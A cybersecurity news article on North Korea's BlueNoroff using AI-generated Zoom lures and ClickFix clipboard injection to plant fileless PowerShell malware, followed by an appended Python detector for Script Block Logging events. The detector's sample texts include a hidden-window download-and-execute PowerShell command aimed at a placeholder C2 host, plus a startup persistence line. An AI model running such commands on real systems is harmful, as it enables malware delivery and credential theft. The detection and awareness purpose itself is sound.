
BlueNoroff Uses Fileless PowerShell, AI Zoom Lures in New Campaign

Sarah Simpson
April 29, 2026

Key Takeaways

  • North Korea’s BlueNoroff (APT38) group is executing a sophisticated phishing campaign targeting Web3 and cryptocurrency firms across over 20 countries.
  • The attack chain leverages AI-generated Zoom lures and a unique “ClickFix” clipboard injection technique to deploy fileless PowerShell malware.
  • Victims, often C-level executives, face rapid system compromise, persistent access for months, and exfiltration of sensitive data, including browser credentials and webcam footage used for future deepfake lures.

North Korea’s state-sponsored cybercrime syndicate, the Lazarus Group, has unleashed a new, highly effective campaign orchestrated by its financially motivated subgroup, BlueNoroff. This operation, detailed in a recent analysis by Arctic Wolf, employs advanced social engineering, AI-generated content, and fileless PowerShell techniques to infiltrate Web3 and cryptocurrency organizations globally. The United States accounts for a significant 41% of the identified victims in this widespread attack, which has impacted over 20 countries.

Sophisticated Social Engineering and AI Lures

The attack sequence begins with a carefully crafted spear-phishing email. Threat actors impersonate legal professionals within the FinTech sector, sending Calendly invitations to their targets. Once a victim accepts the meeting, the malicious actor subtly replaces the legitimate Google Meet link with a typosquatted Zoom URL, meticulously designed to mimic an authentic meeting link.

When the unsuspecting victim clicks the fabricated link, their browser loads a self-contained HTML page. This page is an elaborate replica of a genuine Zoom meeting interface, complete with simulated participant video tiles, looping video footage, and a dynamic “active speaker” indicator. This deceptive environment is critical to the next stage of the attack.

Arctic Wolf analysts confirmed this targeted intrusion against a North American Web3 and cryptocurrency company, attributing it with high confidence to BlueNoroff, also known as APT38, Sapphire Sleet, and Stardust Chollima. The speed of the compromise is alarming, with researchers observing the full attack chain—from initial click to complete system compromise—concluding in under five minutes.

Post-compromise forensic analysis revealed that the attackers maintained persistent access on the victim’s device for 66 days. During this period, they exfiltrated critical data, including browser credentials, Telegram session data, and live webcam footage. This stolen webcam footage is then repurposed to create even more convincing lures for subsequent targets, fueling a self-reinforcing deepfake production pipeline.

Analysts discovered over 950 files on the attacker’s hosting server, comprising AI-generated headshot images – confirmed via C2PA cryptographic metadata as outputs of OpenAI’s GPT-4o model – alongside genuine webcam footage from previous victims and composite deepfake videos. This continuous refinement of their deceptive tactics ensures that each successful attack improves the credibility of future social engineering attempts. BlueNoroff’s strategic focus is evident in its targeting: CEOs and founders constitute 45% of all identified victims, reflecting the group’s intent to gain direct access to cryptocurrency assets and wallet infrastructure.

The ClickFix Payload Delivery

Upon entering the fake Zoom meeting environment, victims encounter a persistent overlay message claiming their SDK is outdated and requires an update. This is the core of the “ClickFix” clipboard injection attack. The overlay presents what appear to be benign diagnostic commands, instructing the user to copy and paste them into the Windows Run dialog or terminal.

Crucially, as the victim copies these seemingly harmless commands, the malicious HTML page covertly replaces the clipboard content with a hidden PowerShell execution command. When the victim pastes and executes, they unwittingly trigger the malicious payload.

The injected PowerShell command downloads an obfuscated second-stage script from the attacker’s command-and-control (C2) server. This script is saved to the user’s Temp folder as “chromechip.log” and then executed in a hidden window. This initiates a persistent, fileless C2 beacon that operates entirely in memory, contacting the attacker every five seconds. The implant gathers extensive system data, including hostname, OS version, running processes, administrative privileges, and timezone information, packaging it into a structured JSON beacon for transmission to the remote server.

What You Should Do

  • Verify Meeting Links: Always cross-reference meeting links through a secondary communication channel (e.g., a phone call or separate email) before joining any virtual call, especially for sensitive discussions.
  • Beware of Software Update Prompts: Legitimate video conferencing platforms do not typically instruct users to run terminal commands to resolve audio or camera issues. Treat such prompts with extreme suspicion.
  • Block C2 Infrastructure: Security teams should immediately block all identified command-and-control (C2) addresses associated with this campaign.
  • Remove Persistence Mechanisms: Delete the Startup shortcut named “Chrome Update Certificated.lnk” and remove “chromechip.log” and “chrome-debug-data001.log” from affected devices.
  • Rotate Credentials: Promptly rotate all browser-stored passwords, API keys, and cryptocurrency wallet credentials on any potentially compromised system.
  • Enable PowerShell Script Block Logging: Implement PowerShell Script Block Logging on all endpoints to enhance the detection capabilities for obfuscated script execution, a key tactic in this campaign.
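To make the Script Block Logging recommendation concrete for the PowerShell chain described above, here is an added Python example (not code from Arctic Wolf or this article) that scores constructed Event ID 4104 ScriptBlockText samples against the behaviours the report describes: hidden-window execution, a download cradle writing a .log file to Temp, execution from that file, a short beacon sleep, JSON packaging, and the named on-disk artifacts. The sample texts, the indicator set and the weights are assumptions built for the demo, not detections from the report.

```python
import re

# Constructed ScriptBlockText samples shaped after the chain in the article; the
# C2 host is a placeholder and none of these are real captured script blocks.
SAMPLE_BLOCKS = {
    "evt-1": "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object LastWriteTime",
    "evt-2": "$u='http://c2.example.invalid/s';$p=\"$env:TEMP\\chromechip.log\";"
             "iwr $u -OutFile $p; powershell -w hidden -ep bypass -c (gc $p | iex)",
    "evt-3": "Start-Sleep 5; Invoke-RestMethod -Uri $c2 -Method Post "
             "-Body ($info | ConvertTo-Json)",
    "evt-4": "Copy-Item 'Chrome Update Certificated.lnk' "
             "\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"",
}

# (indicator name, regex over the script block text, weight). Weights are an
# assumption for the demo; the named artifacts alone are enough to flag a host.
INDICATORS = [
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("download_cradle", r"\b(?:iwr|Invoke-WebRequest|DownloadString|Invoke-RestMethod|curl)\b", 2),
    ("temp_log_dropper", r"\$env:TEMP\\[\w-]+\.log", 3),
    ("exec_from_file", r"\b(?:iex|Invoke-Expression)\b", 2),
    ("exec_policy_bypass", r"-e(?:xecutionpolicy|p)\s+bypass", 1),
    ("short_sleep_loop", r"Start-Sleep\s+(?:-s(?:econds)?\s+)?[1-9]\b", 1),
    ("json_beacon", r"ConvertTo-Json", 1),
    ("campaign_artifact",
     r"chromechip\.log|chrome-debug-data001\.log|Chrome Update Certificated\.lnk", 5),
]


def score_block(text):
    """Return (score, matched indicator names) for one script block text."""
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, text, re.IGNORECASE)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(blocks, threshold=4):
    """Keep only blocks whose combined score reaches the alert threshold."""
    scored = {eid: score_block(text) for eid, text in blocks.items()}
    return {eid: res for eid, res in scored.items() if res[0] >= threshold}


if __name__ == "__main__":
    for eid, (score, hits) in triage(SAMPLE_BLOCKS).items():
        print(f"{eid}: score={score} indicators={', '.join(hits)}")
```

A single low-weight hit such as the beacon's ConvertTo-Json is not an alert on its own; the download-to-Temp, hidden-window and execute-from-file combination, or any of the named artifacts, is what pushes a block over the threshold.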

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
